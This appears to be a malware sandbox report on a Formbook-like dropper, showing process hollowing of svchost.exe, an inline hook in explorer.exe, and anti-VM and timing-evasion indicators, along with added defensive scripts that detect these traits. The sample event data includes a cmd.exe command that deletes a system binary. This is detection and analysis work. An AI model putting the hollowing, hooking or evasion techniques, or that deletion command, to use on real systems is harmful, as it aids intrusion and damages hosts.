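          The process tree above carries three detection opportunities that do not depend on any Formbook signature: svchost.exe is created by the dropper rather than by services.exe, it is created with a command line naming a different executable (the classic trace of process hollowing, where the loader starts a suspended system binary under its own argv), and a cmd.exe spawned from WWAHost.exe tries to delete a file under C:\Windows. The script below is an added example of those three checks over process-creation events, not part of the report; it assumes Sysmon Event ID 1 or 4688-style fields (pid, ppid, image, cmdline). PIDs 1856, 6300 and 616 are taken from the report; the parent PIDs 900, 3200, 7000 and 7001 and the explorer.exe entry are constructed to give the tree a shape.

```python
import ntpath
import re

# Constructed events modelled on this report's process tree (see lead-in for
# which PIDs are real and which are made up).
EVENTS = [
    {"pid": 3200, "ppid": 900,  "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 1856, "ppid": 3200, "image": r"C:\Users\user\Desktop\PI916810.exe",
     "cmdline": r'"C:\Users\user\Desktop\PI916810.exe"'},
    {"pid": 6300, "ppid": 1856, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\PI916810.exe"'},
    {"pid": 616,  "ppid": 3200, "image": r"C:\Windows\SysWOW64\WWAHost.exe",
     "cmdline": r'"C:\Windows\SysWOW64\WWAHost.exe"'},
    {"pid": 7000, "ppid": 616,  "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Windows\SysWOW64\svchost.exe"'},
    {"pid": 7001, "ppid": 7000, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# Binaries that have exactly one legitimate parent on a stock Windows host.
EXPECTED_PARENT = {"svchost.exe": "services.exe"}

# 'del' of anything under <drive>:\Windows, quoted or not.
DEL_RE = re.compile(r'\bdel\b\s+"?([A-Za-z]:\\Windows\\[^"]+)"?', re.IGNORECASE)


def first_token(cmdline):
    """argv[0] of a Windows command line: a quoted path or the first whitespace-delimited word."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(None, 1)[0] if s else ""


def detect(events):
    """Return (pid, rule, detail) tuples for the three hollowing/cleanup indicators."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = ntpath.basename(e["image"]).lower()
        parent = by_pid.get(e["ppid"])
        parent_image = ntpath.basename(parent["image"]).lower() if parent else "<unknown>"
        tok = ntpath.basename(first_token(e["cmdline"])).lower()

        # 1. Image/command-line mismatch. CreateProcess takes the image from
        #    lpApplicationName and argv from lpCommandLine separately, so a loader
        #    that hollows svchost.exe leaves its own path in the command line.
        if tok.endswith(".exe") and tok != image:
            findings.append((e["pid"], "image_cmdline_mismatch",
                             f"{image} started with command line of {tok}"))

        # 2. Parent check for binaries the service control manager owns.
        expected = EXPECTED_PARENT.get(image)
        if expected and parent_image != expected:
            findings.append((e["pid"], "unexpected_parent",
                             f"{image} spawned by {parent_image}, expected {expected}"))

        # 3. cmd.exe deleting a file under the Windows directory.
        if image == "cmd.exe":
            m = DEL_RE.search(e["cmdline"])
            if m:
                findings.append((e["pid"], "delete_system_file",
                                 f"cmd.exe from {parent_image} deletes {m.group(1)}"))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in detect(EVENTS):
        print(f"PID {pid:>5}  {rule:<24} {detail}")
```

          Rule 1 is the one worth deploying first: it is cheap, it needs no knowledge of the family, and it fires on the svchost.exe child here regardless of what the injected payload is. Expect it to need an allow-list for installers and launchers that legitimately pass a foreign command line, and note that WWAHost.exe appearing under explorer.exe is not flagged by these rules because explorer.exe starts many binaries; that part of the tree is better caught by the injection events listed elsewhere in this report.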
          Source: C:\Users\user\Desktop\PI916810.exe | Section loaded: wsock32.dll
          Source: C:\Users\user\Desktop\PI916810.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\PI916810.exe | Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\PI916810.exe | Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\PI916810.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\PI916810.exe | Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\PI916810.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\PI916810.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\PI916810.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: wininet.dll
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
          Source: PI916810.exe | Static file information: File size 1352192 > 1048576
          Source: PI916810.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: PI916810.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: PI916810.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: PI916810.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: PI916810.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: PI916810.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: PI916810.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: WWAHost.pdb source: svchost.exe, 00000002.00000003.2090463981.0000000005800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090278190.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091961931.00000000056A0000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486561760.0000000000260000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: svchost.exe, 00000002.00000003.2090463981.0000000005800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090278190.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091961931.00000000056A0000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486561760.0000000000260000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: PI916810.exe, 00000000.00000003.2031252239.0000000003650000.00000004.00001000.00020000.00000000.sdmp, PI916810.exe, 00000000.00000003.2034353437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2032652059.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035726323.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003900000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.0000000003330000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2092837599.0000000003187000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2091092274.0000000002FDF000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.00000000034CE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: PI916810.exe, 00000000.00000003.2031252239.0000000003650000.00000004.00001000.00020000.00000000.sdmp, PI916810.exe, 00000000.00000003.2034353437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2032652059.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035726323.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003900000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.0000000003330000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2092837599.0000000003187000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2091092274.0000000002FDF000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.00000000034CE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4499137007.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4488075149.000000000387F000.00000004.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486940710.00000000028CD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4499137007.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4488075149.000000000387F000.00000004.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486940710.00000000028CD000.00000004.00000020.00020000.00000000.sdmp
          Source: PI916810.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: PI916810.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: PI916810.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: PI916810.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: PI916810.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004DC304 LoadLibraryA,GetProcAddress | 0_2_004DC304
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00488B85 push ecx; ret | 0_2_00488B98
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041285C push cs; retf | 2_2_0041285F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417008 pushfd ; retf | 2_2_0041700F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004171EF push ds; iretd | 2_2_004171FD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E992 push dword ptr [08CCB4BEh]; ret | 2_2_0041E9AA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E9B2 push dword ptr [0ECCDC24h]; ret | 2_2_0041EACE
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416A81 pushfd ; retf | 2_2_00416A82
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417ABC push edi; ret | 2_2_00417ABD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E46D push ebx; retf | 2_2_0040E470
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D475 push eax; ret | 2_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D4C2 push eax; ret | 2_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D4CB push eax; ret | 2_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D52C push eax; ret | 2_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E530 push edi; ret | 2_2_0041E532
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004177BF push B417C20Bh; ret | 2_2_004177C4
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390225F pushad ; ret | 2_2_039027F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039027FA pushad ; ret | 2_2_039027F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx | 2_2_039309B6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390283D push eax; iretd | 2_2_03902858
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03901368 push eax; iretd | 2_2_03901369
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AEB02 push esp; retn 0000h | 2_2_038AEB03
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AEB1E push esp; retn 0000h | 2_2_038AEB1F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AE9B5 push esp; retn 0000h | 2_2_038AEAE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_1060EB02 push esp; retn 0000h | 3_2_1060EB03
          Source: C:\Windows\explorer.exe | Code function: 3_2_1060EB1E push esp; retn 0000h | 3_2_1060EB1F
          Source: C:\Windows\explorer.exe | Code function: 3_2_1060E9B5 push esp; retn 0000h | 3_2_1060EAE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_10BA19B5 push esp; retn 0000h | 3_2_10BA1AE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_10BA1B1E push esp; retn 0000h | 3_2_10BA1B1F
          Source: C:\Windows\explorer.exe | Code function: 3_2_10BA1B02 push esp; retn 0000h | 3_2_10BA1B03

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE4
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00464A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_00464A35
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004E55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 0_2_004E55FD
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004833C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_004833C7
          Source: C:\Users\user\Desktop\PI916810.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WWAHost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
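          The "User mode code has changed" finding above is the sandbox's inline-hook detector: it compares the first bytes of exported functions in the live process against the pristine image and reports user32!PeekMessageA in explorer.exe starting with 48 8B B8 8D DE E4 instead of its original prologue. A hook on a message-loop API gives injected code a foothold that runs on every iteration of the host's message pump. The script below is an added example of the same comparison, not part of the report or of Joe Sandbox; the six "found" bytes for PeekMessageA are the ones reported above, while the pristine prologues, the GetMessageA trampoline and the SendMessageW entry are constructed. A production implementation would read the module from disk, map and relocate it, and compare each export at the same RVA; only the byte comparison and trampoline decoding are shown here.

```python
import struct

# Constructed prologue windows (6 bytes each). Only the IN_MEMORY PeekMessageA
# bytes come from the report; everything else is made up for the example.
ON_DISK = {
    "PeekMessageA": bytes.fromhex("4883EC284C8B"),   # constructed pristine prologue
    "GetMessageA":  bytes.fromhex("4883EC38488B"),   # constructed pristine prologue
    "SendMessageW": bytes.fromhex("4C8BDC49895B"),   # constructed, unchanged in memory
}
IN_MEMORY = {
    "PeekMessageA": bytes.fromhex("488BB88DDEE4"),   # as reported by the sandbox
    "GetMessageA":  bytes.fromhex("E90000100090"),   # constructed jmp rel32 trampoline
    "SendMessageW": bytes.fromhex("4C8BDC49895B"),
}


def classify_patch(code):
    """Name the trampoline shape at the start of a patched function, if recognised."""
    if len(code) >= 5 and code[0] == 0xE9:
        rel = struct.unpack_from("<i", code, 1)[0]          # E9 rel32
        return f"jmp rel32 (displacement {rel:+#x} from the end of the jmp)"
    if len(code) >= 6 and code[:2] == b"\xff\x25":
        disp = struct.unpack_from("<i", code, 2)[0]         # FF 25 disp32 (RIP-relative on x64)
        return f"jmp [rip{disp:+#x}] (indirect)"
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:
        addr = struct.unpack_from("<I", code, 1)[0]         # 68 imm32 ; C3
        return f"push {addr:#x}; ret"
    # Anything else: a custom stub, or code restored to a different version
    # of the DLL. Disassemble the region and follow the control flow by hand.
    return "unrecognized patch"


def find_hooks(on_disk, in_memory):
    """Return one record per export whose in-memory prologue differs from the image."""
    hooks = []
    for name, pristine in on_disk.items():
        live = in_memory.get(name)
        if live is None or live == pristine:
            continue
        hooks.append({"function": name,
                      "expected": pristine.hex(" "),
                      "found": live.hex(" "),
                      "kind": classify_patch(live)})
    return hooks


if __name__ == "__main__":
    for h in find_hooks(ON_DISK, IN_MEMORY):
        print(f"{h['function']:<14} expected {h['expected']}  found {h['found']}  -> {h['kind']}")
```

          A changed prologue is evidence of a hook, not by itself of malware: EDR agents and Microsoft's own hot-patching also rewrite function entries. The discriminator is where the trampoline lands; a jump into an image-backed module you can account for is benign, a jump into the kind of executable, non-image region this report lists for explorer.exe is not.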

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\PI916810.exeAPI/Special instruction interceptor: Address: 10FE8C4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 219904 second address: 21990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 219B6E second address: 219B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2912Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7030Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 746Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 734Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeWindow / User API: threadDelayed 9842Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\PI916810.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100206
          Source: C:\Users\user\Desktop\PI916810.exeAPI coverage: 4.5 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 1.9 %
          Source: C:\Windows\explorer.exe TID: 5948Thread sleep count: 2912 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5948Thread sleep time: -5824000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5948Thread sleep count: 7030 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5948Thread sleep time: -14060000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6484Thread sleep count: 129 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6484Thread sleep time: -258000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6484Thread sleep count: 9842 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6484Thread sleep time: -19684000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004C4696
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CC93C FindFirstFileW,FindClose,0_2_004CC93C
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004CC9C7
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004CF200
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004CF35D
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004CF65E
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004C3A2B
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004C3D4E
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004CBF27
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00464AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00464AFE
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.2046728721.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000003.00000002.4492745414.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000003.00000003.2422468972.000000000354B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000003.2422468972.000000000354B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000000.2044763297.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
